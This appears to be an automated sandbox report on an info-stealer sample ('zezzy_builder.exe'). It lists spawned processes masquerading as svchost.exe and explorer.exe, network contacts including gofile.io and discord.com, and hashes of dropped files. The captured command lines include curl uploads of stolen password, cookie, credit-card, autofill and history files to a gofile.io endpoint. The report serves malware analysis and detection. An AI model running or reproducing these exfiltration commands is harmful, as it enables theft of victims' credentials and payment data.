"C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\explorer.exe

"C:\Users\Admin\AppData\Local\Temp\explorer.exe"

C:\Users\Admin\AppData\Local\Temp\explorer.exe

"C:\Users\Admin\AppData\Local\Temp\explorer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp5786.tmp.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile

C:\Windows\SysWOW64\taskkill.exe

TaskKill /F /IM 4960

C:\Windows\SysWOW64\timeout.exe

Timeout /T 2 /Nobreak

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 104.26.2.16:443 rentry.co tcp
US 8.8.8.8:53 16.2.26.104.in-addr.arpa udp
US 104.26.2.16:443 rentry.co tcp
US 104.26.2.16:443 rentry.co tcp
US 104.26.2.16:443 rentry.co tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 142.53.16.96.in-addr.arpa udp

Files

memory/928-0-0x0000000074F4E000-0x0000000074F4F000-memory.dmp

memory/928-1-0x0000000000860000-0x000000000154E000-memory.dmp

memory/928-2-0x0000000005DB0000-0x0000000005E4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 b9e0f12dac33aeacd4c95a89d3084a66
SHA1 2ad8173c61907a949e5b0c0d60064336b12583c3
SHA256 3520bdc6dd768a63a429517e4270740b514387835fe4a4918fd14cd6e47fdd24
SHA512 4c57c55123edbae3862b3b028ffb2927202558264933f8c89924185bc9199a524d5e1da81125a72d76a06110de3f76c0e682db97221ab96729df01d462dd3e52

memory/4960-15-0x0000000074F40000-0x00000000756F0000-memory.dmp

memory/4960-18-0x0000000000890000-0x0000000000A24000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\explorer.exe

MD5 ab2200a32cc9b4ca9482a8c5c1f02ec7
SHA1 d6bf0fdbb707003772bc26f96de35a5875846cec
SHA256 d2698f6ebf00ae0975c0f4b441381bdedfc2612f79b2fd221542bf18560aa650
SHA512 8535e7bf34aa649e7d56cba1ffc80c08f919686b88da037ef920abbbd8d602a54ebea433c85fc0a2f3948ca0ab08fbf4e9de3fe5f86326aee85cdf4f66a5bc29

memory/4960-21-0x0000000005A00000-0x0000000005A66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI28562\ucrtbase.dll

MD5 d7e7a4c519004d1558fcab9e9eb371a3
SHA1 133d0745f0f6f720c019c9bdcaf1a2ea6ddd21cc
SHA256 7773484bd0ecf89bec67619a38ac73167c2d8cf40613d68a773c07955bcaa94f
SHA512 07557ebf82ae51ee678fe88570f48a011bcdcbcf58504c4b51e9d0f3faf481a63d236c3c4c55c96371de1dde81e881a7fbed828e1ba11b280a9cd42ba11b7344

C:\Users\Admin\AppData\Local\Temp\_MEI28562\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI28562\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI28562\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI28562\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI28562\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI28562\sqlite3.dll

MD5 612fc8a817c5faa9cb5e89b0d4096216
SHA1 c8189cbb846f9a77f1ae67f3bd6b71b6363b9562
SHA256 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49
SHA512 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

C:\Users\Admin\AppData\Local\Temp\_MEI28562\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI28562\libssl-3.dll

MD5 19a2aba25456181d5fb572d88ac0e73e
SHA1 656ca8cdfc9c3a6379536e2027e93408851483db
SHA256 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006
SHA512 df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

C:\Users\Admin\AppData\Local\Temp\_MEI28562\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-utility-l1-1-0.dll

MD5 47b96adf342ccee971106b5dd54c48c7
SHA1 64532d9701e3b95cc056d99b05edfd0c16196b03
SHA256 bf5127b567165aaa5782f4873df4e7e10818c718e9293a1d7afb500ecfff5f9d
SHA512 484e2af21dafcca6e29a45a4980c49ecee39ffa606342456f96a8ddfdde1b3657e903b2aeab7455354075a1afdb893afdcffed9d938bf545c2688682f5315e53

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-time-l1-1-0.dll

MD5 1f72fa30d72bc45a335b6b735e67821f
SHA1 1579ba7cd33eba8746423e6a5d4ba73d5294b27f
SHA256 500736198f6cad0b8c0686815d657a6846d2b250fe059618765e603be0b8c5af
SHA512 3524968906c9f4734695629bbb963dd818f39c677729ca0786b2674fcc2d75e484ea3c241aac4907a82a922c8e3c25eebc554284a6063d83e590f330f945ec0a

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-string-l1-1-0.dll

MD5 9b4f218445adf217ab0fbb9a3479b815
SHA1 3119a92b8fe18a62f5e0c36afb49d8140d8785d3
SHA256 70eabe35e93e68117092591012683438f051834a46d55682f5bca7c39809ddd3
SHA512 f343fc024da7f04279027fcb4c94231a0c285879707e3215a2fc6cce2a96414157e2507d3007edfb723a8946b30513c11e406d5ae03610f403ff6477414daaec

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-stdio-l1-1-0.dll

MD5 14699241e691c8abdfcb0502bed717b2
SHA1 2160c397fa946edb67f6bd827b31c926ddf49f59
SHA256 b1cbaf5ea5638cefd60f600acd1315d6f5b51aafdd54b57c7321bf2457351051
SHA512 579c5a37506c7c1b4d52c4f64a05e234d524a19a46458d6a62a72eafeca8c32df9fab22acb93f76effc8622a1c8969cc57844d19a163e91d16e570ae2794dbc1

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-runtime-l1-1-0.dll

MD5 d9063c0c60de5e9c1f68db8ab273a5b8
SHA1 5a5faf40a299e5421f6ef05999a3bc9b5eea2ae6
SHA256 9bdb98b4efb314dd7a427ed8dde7dad1c00fde89b9f08fb3d71e679c562946df
SHA512 8c3591d6f6bc1a960e6efcf74dc26172e5c541adae0f40656504e47bc42ea8b8026289ec96e64247e21e5af8fbdd9514001f7c068ba27f2c923e15895e6bb2c9

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-process-l1-1-0.dll

MD5 0e2cf0a1564a204dfed09e2917e72dd6
SHA1 383eb83bdfa9887ad7ea8a11a20a8f6c7b7ab57f
SHA256 3b148d5ecdf5cd15bfa27b55a977da7c92bb6fd46b39b5e70b5ae4fc679bbd78
SHA512 2112c83140d9b2d31871f6f49f05ad4fb52bdaedc149f2a645b86d13f1fe275d18f3cd1f597e60c25b29652cc268b29ae758c577ea82041f0166ee5f37c04d4e

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-math-l1-1-0.dll

MD5 510820972de629d80e686ef86e3178c1
SHA1 ba37cc7d377c444acdddfe109b7dad84035d8def
SHA256 4a929ac072d02499e7a204f4c902be632f61f09021ef8664ff9959c60f00843a
SHA512 0e739bffd938f3020d9ed9ece8704c131ee1547beae15e2a0e5becc23eb7290d0cc855b57a7e0675f33c553d60ecc44f4079f5b5f6e06ba41969b1f715b34d5d

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-locale-l1-1-0.dll

MD5 8ef95fe0ab3289a22985d49b593a8754
SHA1 e8bc5380ef5c351fe9d4bae71d4e12dc0de3f3d4
SHA256 841d65716305dd91a2052bcd8c866402c88c1ccf20573db2f9488467509539ed
SHA512 5f9fb68fc52182991eab603083b05f87deb13613efbca2f63b2bf207d9505aabb625e0a11d1a2cb60280687a1416c162be606ce80ad1b6d9bdd07be65c447b35

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-heap-l1-1-0.dll

MD5 0f5100f3dc18604ea97f4de6849b3037
SHA1 745c67e85a06526b08beffb7597be05d4541a79c
SHA256 33ffc369c508bcf5f46424335f5f0608abd77257ed8c35b6f62e6fa365340f2f
SHA512 a53d9cab3ce469dfcdc73fbc32ae5a8ea8aa4f7de139328f5cfed2c95a6455491c6aea0b1ddc505a475b350601e509f2df7701ec9e92dd3d7bdbbae8d43bb272

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 bec6f1a1281b35a204d9f6775e6e152f
SHA1 74d155432ffb3113f3b51a862202739f59fbd1e9
SHA256 bb085158689cfb4bce8c5619d1994fa82ed8e01babbd8a5b842ed4ef5bd07d9e
SHA512 a800e4a003d833c8923af265dbbb9d48d372a3d890a772c385ddf285eaaab96b4d6743a7513817dd83941ad6bda6da9a4b82ae5e7ca8840920a1df97696bec1a

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-environment-l1-1-0.dll

MD5 cc9f603588cd39c747117c305ed325e5
SHA1 11dc918cd355ee3e9ea4d8c861a466fb73ab543d
SHA256 3cd7f74f644b0be5a78b9be75c20a17898909b6835d74aece720882b588f1e08
SHA512 bf7914820f2317fcd49f5ee041fa94d6aefcac9317c77aacfc4f0d429f1baf471efa1648dcfafa0f8aa52fe1a83d750fc79d7a5deb30c1ffccc775be141692f0

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-convert-l1-1-0.dll

MD5 9784bf31c01acc11f75303d8e8ea3951
SHA1 4a4ede077eb16d709be96daf5df004cd8c22596b
SHA256 d104429c919f98468fcd1f108c97a9b68886b61e36a3952104c55a31f4481002
SHA512 28ccdd431531cddd68008a37acde029359c0b3c35d59069810593e31726d7d55873decb8caefd877ad66db0635fe786f7a21b373635e95c7c28c6faec1e7d682

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-crt-conio-l1-1-0.dll

MD5 43de174005a9d01c739a432dcd56cfc6
SHA1 e806fde4df68ebec86fb77eec1dea559fb3f9c2e
SHA256 2d1d7728a0dca0bd46a08e77bbc384e687c552dd6486a5933204fb8a503395e8
SHA512 10fb759b73c7585fd98abeb5cf2ce54fea84038d9c50ee2e326bca07a06d43b75e69164f9cc9f9dd5b262289506517fdffee208eb505a6eaa25b77739cda8ae9

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-util-l1-1-0.dll

MD5 f5f5f73ae512bd7fdbf95347c0e58e40
SHA1 ec3c7fc1540cc6cf944218962bbebf59aa1be3ec
SHA256 8febaf7082bd576e29e317b8fc888af086443cb8d515cbe543ab0c3512c2cdc1
SHA512 1f7df88b40549e0a1a4f8b4a3020c65c569dcce10b1ce8d8d3ee699de64476996e242c5eee54e0100d47f22b463732f682530ad23a4452328d37223bcfbc8bf7

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-timezone-l1-1-0.dll

MD5 fa86f68762f0cd75312afd7d5c47df16
SHA1 46588f341e6fec08c6439adb0351bc34340ff89e
SHA256 407e5400dbdb2df0ba00b471464ae781588ab566c3e11957cc01efad4a8e1e1b
SHA512 dc3f77ad906390bf50a7a319cb03fbfb8894515c0d0ce21c03bfd7acff1df991511f4d2f6693760b98d497b44837d1b3b0bfca72cf998dbfce8d9b4863997131

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 17d2e0b17750a22c2084c31d624d326f
SHA1 02134c69be9f1f52fb7d3c0b967b4c5f302d6917
SHA256 4a03e898e88b1e2fd6c08522b07105d460ba6ff8e19f88f2d08828b3cc08b48a
SHA512 5d4f78f218222b4d9cefda526198bb0ec294b3bbc758c2fc87a5bce3d3feba0d28dee106f04050bd27a5356dcb0369c2d8f8bc701fd170343fc7a179a8940272

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-synch-l1-2-0.dll

MD5 9760553ce803ddca808a36af32868bb5
SHA1 154cb93b172c3c297a07bdaf3ac9aa91ea86d30b
SHA256 6de7ddbdfe7d151ac6a1646fbdf03d7b482b5c70c6f70fba30db21ce2fd11bab
SHA512 ec8842ba6572fb79c512cd570fc888579b39bf2e8c9d0e128901e938dfca36a645df4f6943d0e7c14b8399ac1fb3c52f9190530e45effe16cf57ebd97efd6664

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-synch-l1-1-0.dll

MD5 1a509a36eeb8ccd0f9b2dae0aa5a10d2
SHA1 0bba16dbb08b27e70c721e860313d08869c0c9bd
SHA256 d671a5e1302e42c2ad36f0ea6519025c9fb44eb96d047307e43837f7ddd3a08b
SHA512 0f3b4daf5f203a458accacd7329f865bd109563978577dccdf95bcc180cf87e8c2eebbed9b43c601872b93a2dca0cd5dd20ff51a8036f78906f0577e904835c1

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-string-l1-1-0.dll

MD5 351bc4e8fddcad38f8e2a42f879a0009
SHA1 3d019ae950d60b1a0c942904b11974cccb84cf9e
SHA256 b94ad9685fc9ba121a373806d5e2188b3519b6331ee23b044a6d1f0e0d160f37
SHA512 12539c115fb6898ea53ac4246e06260244fc91746fe4de41b332efd27ed56e297b83327c34599a11964d81d6a79c7e61383004ce05a458dc37e1bff4db8e341c

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 730e6dd7ee5989141c903572e8abd007
SHA1 26d362ae98232f0c7aa5882845c9bae6fdbeea00
SHA256 80854bb2bb34ba22be2d47ae961bce9514d608490ad85ba32b63092d7fc020f9
SHA512 207fc7d37e8ee769f4c6287cf777857f19887dfcb7da3d104e61ac937735d7f6cdf0e11b2bb1fac4a5d318135cbda2b60578c2186acbddc4700046247f49e7c0

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-profile-l1-1-0.dll

MD5 0cee4ad8a7cd31c34146ebc865ecc2d3
SHA1 6d83f8735dc4bd40a9688fb467671ba250038f9d
SHA256 af474c502d71a25fcfe5f1d431314fccfa338cd946c222397941b68d4df21941
SHA512 8a5c1416b13088e94d4d3ddec265517e4981c7faa6e8909b3c2211830de8b1d32e13e789dcf3590b9e5331b55b5d5189965a749b66d572c2725c18a115f02455

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-processthreads-l1-1-1.dll

MD5 43d4d038146c4be8ed2c06e1db7ba886
SHA1 1aca2239158574d810695a1942d1afabf737dcfc
SHA256 7b8da89fb25b02280a0c378a536a966bb1050d69ac25980cfd68a7483d7fa982
SHA512 3d34fb8f70772fcc0e7d7405a24fc9075002352ab4c8a3a09e15c60958ed48e4f955cec7a46aead99667b924449f16dc3d41c418044ca08bc1f9a473e0e7eb55

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-processthreads-l1-1-0.dll

MD5 88c725557e0a4d1a2f490a69dd6aae4c
SHA1 b01209749ba7c5a5f04c05ed3d97431a803d80d3
SHA256 eb34fc0cff2cae86d06ef95922566abde324982a4b6c64380cc68031d234f546
SHA512 8c3b47342c0a2cdadc892a81688221c11408e97d8162334f460a6fe0d93f332e2c6a7323a2e9a892e0ec5aafcb7889dffd0c38464b2493ead5e6a07b471baaef

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 ec2b8864ec00412524cac612b69016f6
SHA1 a2a0abcb1b50b4703f355a1806351449a0f11f17
SHA256 5cb2148cf2408e03216b773e268f22ad076bb27acba43bfa8e42afaf61088d3d
SHA512 e214bad1081ec86c9004a62576c19ec0ca4f8e3dd30dbe994d8c8730d4408e0a30e64515e58064a0182815e75fafcfec496153535d8ece88f4f0b11fe06e4703

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 e9e492b587cc3cea9d009c22f5c79836
SHA1 611112690e4a17f5bd2c961acf15b84aaf4a252d
SHA256 a4dac4f5e3b50955ac529644ebe18735b63e17f42a5206f12aa9bd22b724b53e
SHA512 602a686f94654746ab30a931246b2a3efa8a48a3bf74de86da124b9758bb6885875768b8de3f10f3b9e71291e15821760b5606c63970c5ec4aa795834b52e942

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-memory-l1-1-0.dll

MD5 abee4dbcc78b27db4c6360f018517aba
SHA1 383f87cccb0c8ddfc9df82a4882a176c7c421183
SHA256 4d7267bb02003ac5d77f6be288eda924ece6ce7d6223d5366641948ed8b526a1
SHA512 480e5e384637fad90776c7e7c1aed1499f743b66e3214a616486703399c51467cf39294f06803e614e43c27129e89d21543a005a82d4e1b16ec20fef8f0289a2

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-localization-l1-2-0.dll

MD5 c643ebfede7ae34fa29571dc5a14a917
SHA1 820b875318de9f368c153678c71810c69c07be4f
SHA256 619143dd552b5e47f6c2fd9585d8d7b89ec34b1adce17945ea362fec986f23a9
SHA512 c1514622fe81bd36256a14030192a1d9b662157893e8cc3fc9a0519295e6d8b5dd59d7a04fdcc3f89a705e6f5b13e0f09a1b778281a361c82a74db467d3efb3e

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 10cd98784a5cff1930b4d2e6ab73ae97
SHA1 a81d35c84af24bdb265739daafae6bc5f47e2e36
SHA256 8a7c0e734446d04124449048e25225f4bf4515f592d9b9840108c9dbf4f1500b
SHA512 c6a1808346e33b99ac832b7062b45ce4bf5c6812c4ba77aba67c4360b502262d019177179918db25689fde6a2be1557b18dcb8ed0433e6d25532b97960c9f1a2

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-interlocked-l1-1-0.dll

MD5 6574c9ee2a7df77407762c118fa6170a
SHA1 47c575454c2f8aa6ac058f1c6d1ae1c65c89701d
SHA256 b7a4be5ee285edeb680538b80a4e746edf10070c28f5614a13099d0633f251c9
SHA512 9c12f6971af0112d43a5fe80f968cf23b88324f9de010fc47040ae42598da2a22374278ae1e1341c5fffd97d80b44af1a2d335c1dcae23682ca5bab5e22dfeaf

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-heap-l1-1-0.dll

MD5 726f2c62436bca1891daeaf13e3fd872
SHA1 08584e7977036d355aa9c14228e2d4a4b0933206
SHA256 e748615274432da830477bc9bb8f814672d85a77435a885affe1bcde4cfb67e3
SHA512 61c715f17145681b136794dcfa269d07d105a7f7d1c2286acf3c7447e37814379b41112afa18013587cab91f77c5181c20eaf02e9fdda5913d5f72e1c2a4acf6

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-handle-l1-1-0.dll

MD5 f16309ccfa711d3b8a4607d4c2877080
SHA1 9cd20cce520ce7b2a28df2a8787112ebee582208
SHA256 0aa4cad67bd2253163b572c4f4f95b0c6ae3645310e5a847740601a4102278ea
SHA512 03d9e8d65209b11fc995c57bd0d611080ebb4a5f690391f5e0075992022ce6f5f07690ef4f793049a617ba77432fe3a221f0a09267343d6cb0b3ff3a9d63e641

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-file-l2-1-0.dll

MD5 11c308210b76b97471b325ab28cd4da6
SHA1 75d423531e1cb8b8ba147cd6263d2fa45321521a
SHA256 71bbc4c856aefd56a6273d5b5509cbc9389ceb99e6109342f46d55954a662abc
SHA512 0d50a2c49e5faab76dbafdffecdf9f465e0648cd68f8fb66cbb414f4cd9cd4da0ee228c46efc4cd4ee28039f463e686676e43f4f92471445fd578e8a2eff270f

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-file-l1-2-0.dll

MD5 5aa63c15230b86310056a7dd1d9dc82b
SHA1 c96526190b93053f7521fe48a2171644d136f68d
SHA256 13f5e092d2db88b17e3e8fc9c0cc659c7d3816c161fa276dbde6fcf8c26311ad
SHA512 9a62dde3a5d4763a28a3cb6f78b0d35525b4d5ecc51716e4f68853fbe9ef6f389d1b13f4500dbca1dc8e2891d6062c7ac70087a79aff22e004c301cfdb7e91bd

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-file-l1-1-0.dll

MD5 5276f83ca373f67bc0fad6ccef49a612
SHA1 a98e1bfc4cf4723f5bb97efe33a01caa2c3a87be
SHA256 d00e176f4d19a2b653e42c1f5c1088169027d14a4b40b618cac1d245f4c3c311
SHA512 a6bde9b4185259d61cd7c1fb20bc499771dd62b14ab77ec2e1637d38f78ffa9b9c645a5e4e0075154f2d0b7db2f440fcf9d8c3731272922ab673503c3b82ced7

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-fibers-l1-1-0.dll

MD5 8cd338f3f6ef0ac439769248d324d11a
SHA1 206f9bb7f5ec09d187bf3a87eb8cfcd01b815a94
SHA256 31b86db2b1d9ae0f2422308c9bcb63d7723244cfe0cdfb17d21c2420e36e16c2
SHA512 c20c205f7b15bc8cde52c37948442ac8ea4d4cda44dc4b78df42b800e92135028aee9891ea7934b8898326c0e307c5c7617b9f6f54197b7ec176aa7c4eaccc37

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 e6200d2b3762062f6f17cb7f1cbd1355
SHA1 e09749529e52e4121f834b063871f6ffe78d3c54
SHA256 02cb521cc2a2d3e5b064af7df0d889e7d1f2365189521e04d07309c2a9657fdc
SHA512 cecea2f3570043edc9e0b094c3def19459da61e25817394b531380fea0978b618d990e39dd4dc894bfc69798238f5942d8fdf294dd6efeacaf22084fb6933533

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-debug-l1-1-0.dll

MD5 c4592aeaa9ec4f036063e3effa32589d
SHA1 95808bcc1bb66ad39c5048b738b50e5ff9306efa
SHA256 388339426d7d08a03a350eaa9079a8bb09fb9c643cea6ed6ebffb00757df4b21
SHA512 0af63b47eccfba29ef46e5dde1d67eb8e15eda78b5196af5d56e0ff93b030ed65e3614f5515cd032d6cfe37a7656b70517583698db1ff8c813ed89338f8ce01a

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-datetime-l1-1-0.dll

